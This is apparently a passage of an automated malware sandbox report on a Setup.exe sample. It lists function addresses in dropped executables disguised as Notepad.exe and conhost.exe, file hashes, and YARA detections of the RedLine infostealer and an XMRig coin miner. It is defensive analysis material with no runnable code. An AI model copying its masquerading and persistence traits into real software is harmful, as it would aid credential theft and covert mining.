Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F051A5D8 6_2_00007FF7F051A5D8
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0501E60 6_2_00007FF7F0501E60
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0502680 6_2_00007FF7F0502680
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0502064 6_2_00007FF7F0502064
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0514860 6_2_00007FF7F0514860
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0502884 6_2_00007FF7F0502884
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0511518 6_2_00007FF7F0511518
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050F110 6_2_00007FF7F050F110
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F05040C4 6_2_00007FF7F05040C4
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F90C0 6_2_00007FF7F04F90C0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_01510118 7_2_01510118
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_0151E418 7_2_0151E418
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_01519530 7_2_01519530
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_0151B740 7_2_0151B740
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_0151D6C0 7_2_0151D6C0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_01519FA0 7_2_01519FA0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_015186E8 7_2_015186E8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_01516B97 7_2_01516B97
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_01516BA8 7_2_01516BA8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_0335DC74 7_2_0335DC74
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEA518 7_2_05DEA518
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEE4E8 7_2_05DEE4E8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEAC80 7_2_05DEAC80
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE8430 7_2_05DE8430
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE7FC8 7_2_05DE7FC8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DED788 7_2_05DED788
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE9ED8 7_2_05DE9ED8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE8E08 7_2_05DE8E08
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE6178 7_2_05DE6178
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DECBB0 7_2_05DECBB0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEBB48 7_2_05DEBB48
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEFA88 7_2_05DEFA88
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE5560 7_2_05DE5560
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEA509 7_2_05DEA509
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEE4D8 7_2_05DEE4D8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE7FB8 7_2_05DE7FB8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE0710 7_2_05DE0710
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE0700 7_2_05DE0700
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE9EC9 7_2_05DE9EC9
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEC618 7_2_05DEC618
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEC60A 7_2_05DEC60A
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEF130 7_2_05DEF130
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEF120 7_2_05DEF120
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE58A8 7_2_05DE58A8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DECBA0 7_2_05DECBA0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEBB39 7_2_05DEBB39
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEFA78 7_2_05DEFA78
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Code function: 8_2_00007FF68CC637B0 8_2_00007FF68CC637B0
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_00F8E7B0 10_2_00F8E7B0
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_00F85AC0 10_2_00F85AC0
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_00F84C9F 10_2_00F84C9F
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_00F8DC90 10_2_00F8DC90
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_06359628 10_2_06359628
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_06354468 10_2_06354468
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_06351210 10_2_06351210
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_063532C8 10_2_063532C8
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_0635DD00 10_2_0635DD00
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_06352DA9 10_2_06352DA9
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_0635D108 10_2_0635D108
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A5C90 13_2_00007FFE0C0A5C90
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0AF8BC 13_2_00007FFE0C0AF8BC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A8CD0 13_2_00007FFE0C0A8CD0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A2520 13_2_00007FFE0C0A2520
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A6E50 13_2_00007FFE0C0A6E50
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A12B0 13_2_00007FFE0C0A12B0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A5360 13_2_00007FFE0C0A5360
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A1BA0 13_2_00007FFE0C0A1BA0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A2FD0 13_2_00007FFE0C0A2FD0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE1025C8BC 13_2_00007FFE1025C8BC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10253C80 13_2_00007FFE10253C80
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10253F10 13_2_00007FFE10253F10
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10256100 13_2_00007FFE10256100
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10252F00 13_2_00007FFE10252F00
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10251000 13_2_00007FFE10251000
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10303280 13_2_00007FFE10303280
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE1030531C 13_2_00007FFE1030531C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE11517CA0 13_2_00007FFE11517CA0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE12E11630 13_2_00007FFE12E11630
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE12E110C0 13_2_00007FFE12E110C0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C3F50 13_2_00007FFE130C3F50
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C1F50 13_2_00007FFE130C1F50
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C27A0 13_2_00007FFE130C27A0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C2ED0 13_2_00007FFE130C2ED0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C39F0 13_2_00007FFE130C39F0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C32E0 13_2_00007FFE130C32E0
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BB9B8B 18_2_00007FF702BB9B8B
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BB7950 18_2_00007FF702BB7950
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD789C 18_2_00007FF702BD789C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD6BCC 18_2_00007FF702BD6BCC
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC3330 18_2_00007FF702BC3330
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD7350 18_2_00007FF702BD7350
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD4CFC 18_2_00007FF702BD4CFC
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC6510 18_2_00007FF702BC6510
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC8CB0 18_2_00007FF702BC8CB0
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD24C4 18_2_00007FF702BD24C4
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC3CC0 18_2_00007FF702BC3CC0
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC2474 18_2_00007FF702BC2474
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC842C 18_2_00007FF702BC842C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BCAA10 18_2_00007FF702BCAA10
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD6950 18_2_00007FF702BD6950
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC2270 18_2_00007FF702BC2270
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC8278 18_2_00007FF702BC8278
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BCEA90 18_2_00007FF702BCEA90
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BCF110 18_2_00007FF702BCF110
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BB90C0 18_2_00007FF702BB90C0
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC40C4 18_2_00007FF702BC40C4
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD4860 18_2_00007FF702BD4860
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC2064 18_2_00007FF702BC2064
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD1518 18_2_00007FF702BD1518
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC2884 18_2_00007FF702BC2884
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BDA5D8 18_2_00007FF702BDA5D8
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BCE5FC 18_2_00007FF702BCE5FC
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BBA55D 18_2_00007FF702BBA55D
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC842C 18_2_00007FF702BC842C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD1518 18_2_00007FF702BD1518
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BB9D2B 18_2_00007FF702BB9D2B
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC1E60 18_2_00007FF702BC1E60
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC2680 18_2_00007FF702BC2680
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE014C3280 19_2_00007FFE014C3280
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE014C531C 19_2_00007FFE014C531C
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A5C90 19_2_00007FFE0C0A5C90
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0AF8BC 19_2_00007FFE0C0AF8BC
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A8CD0 19_2_00007FFE0C0A8CD0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A2520 19_2_00007FFE0C0A2520
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A6E50 19_2_00007FFE0C0A6E50
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A12B0 19_2_00007FFE0C0A12B0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A5360 19_2_00007FFE0C0A5360
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A1BA0 19_2_00007FFE0C0A1BA0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A2FD0 19_2_00007FFE0C0A2FD0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE101D7CA0 19_2_00007FFE101D7CA0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10301220 19_2_00007FFE10301220
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10303AD0 19_2_00007FFE10303AD0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE1151C8BC 19_2_00007FFE1151C8BC
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE11513C80 19_2_00007FFE11513C80
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE11512F00 19_2_00007FFE11512F00
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE11516100 19_2_00007FFE11516100
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE11511000 19_2_00007FFE11511000
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE11513F10 19_2_00007FFE11513F10
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C3F50 19_2_00007FFE120C3F50
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C1F50 19_2_00007FFE120C1F50
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C27A0 19_2_00007FFE120C27A0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C2ED0 19_2_00007FFE120C2ED0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C39F0 19_2_00007FFE120C39F0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C32E0 19_2_00007FFE120C32E0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE12E11630 19_2_00007FFE12E11630
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE12E110C0 19_2_00007FFE12E110C0
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Code function: 38_2_00007FF7A81D37B0 38_2_00007FF7A81D37B0
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Code function: 43_2_00007FF7ECBC3B50 43_2_00007FF7ECBC3B50
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE01213280 48_2_00007FFE01213280
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE0121531C 48_2_00007FFE0121531C
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE10257CA0 48_2_00007FFE10257CA0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F3F50 48_2_00007FFE110F3F50
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F1F50 48_2_00007FFE110F1F50
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F27A0 48_2_00007FFE110F27A0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F39F0 48_2_00007FFE110F39F0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F2ED0 48_2_00007FFE110F2ED0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F32E0 48_2_00007FFE110F32E0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13201220 48_2_00007FFE13201220
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13203AD0 48_2_00007FFE13203AD0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13225360 48_2_00007FFE13225360
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13221BA0 48_2_00007FFE13221BA0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13222FD0 48_2_00007FFE13222FD0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13226E50 48_2_00007FFE13226E50
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE132212B0 48_2_00007FFE132212B0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE1322F8BC 48_2_00007FFE1322F8BC
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13225C90 48_2_00007FFE13225C90
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13228CD0 48_2_00007FFE13228CD0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13222520 48_2_00007FFE13222520
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE1325C8BC 48_2_00007FFE1325C8BC
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13253C80 48_2_00007FFE13253C80
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13253F10 48_2_00007FFE13253F10
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13252F00 48_2_00007FFE13252F00
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13256100 48_2_00007FFE13256100
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13251000 48_2_00007FFE13251000
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE148E10C0 48_2_00007FFE148E10C0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE148E1630 48_2_00007FFE148E1630
Source: C:\Windows\System32\conhost.exe Code function: 52_2_0000000140003150 52_2_0000000140003150
Source: C:\Windows\System32\conhost.exe Code function: 52_2_00000001400026E0 52_2_00000001400026E0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0E171220 57_2_00007FFE0E171220
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0E173AD0 57_2_00007FFE0E173AD0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB212B0 57_2_00007FFE0EB212B0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB26E50 57_2_00007FFE0EB26E50
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB22FD0 57_2_00007FFE0EB22FD0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB21BA0 57_2_00007FFE0EB21BA0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB25360 57_2_00007FFE0EB25360
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB22520 57_2_00007FFE0EB22520
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB28CD0 57_2_00007FFE0EB28CD0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB25C90 57_2_00007FFE0EB25C90
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB2F8BC 57_2_00007FFE0EB2F8BC
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB5531C 57_2_00007FFE0EB5531C
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB53280 57_2_00007FFE0EB53280
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11073F50 57_2_00007FFE11073F50
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11071F50 57_2_00007FFE11071F50
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE110727A0 57_2_00007FFE110727A0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11072ED0 57_2_00007FFE11072ED0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE110739F0 57_2_00007FFE110739F0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE110732E0 57_2_00007FFE110732E0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BC2F00 57_2_00007FFE11BC2F00
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BC6100 57_2_00007FFE11BC6100
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BC1000 57_2_00007FFE11BC1000
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BC3F10 57_2_00007FFE11BC3F10
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BC3C80 57_2_00007FFE11BC3C80
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BCC8BC 57_2_00007FFE11BCC8BC
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11EA7CA0 57_2_00007FFE11EA7CA0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE1A471630 57_2_00007FFE1A471630
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE1A4710C0 57_2_00007FFE1A4710C0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe A0A9AA62080C1A543E11E5853FCD6964E598B59A0A7C24DE7A7F1D951177E564
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Notepad.exe B3BFD7D408A13096897FE8CBAFF158CB8FF34F6D2D2269B25A1A268DAEEF387C
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\_MEI70442\VCRUNTIME140.dll 4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
Found potential string decryption / allocating functions
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Code function: String function: 00007FF7ECBC1394 appears 33 times
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Code function: String function: 00007FF7A81D1394 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: String function: 00007FF7F04F2B10 appears 47 times
Source: C:\Users\user\Notepad.exe Code function: String function: 00007FF702BB2B10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Code function: String function: 00007FF68CC61394 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Code function: String function: 00007FF7010C1394 appears 33 times
PE file contains executable resources (Code or Archives)
Source: unicodedata.pyd.6.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.18.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.47.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.56.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Sample file is different than original file name gathered from version info
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOverpeers.exe8 vs Setup.exe
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameImplosions.exe4 vs Setup.exe
Uses 32bit PE files
Source: Setup.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Yara signature match
Source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
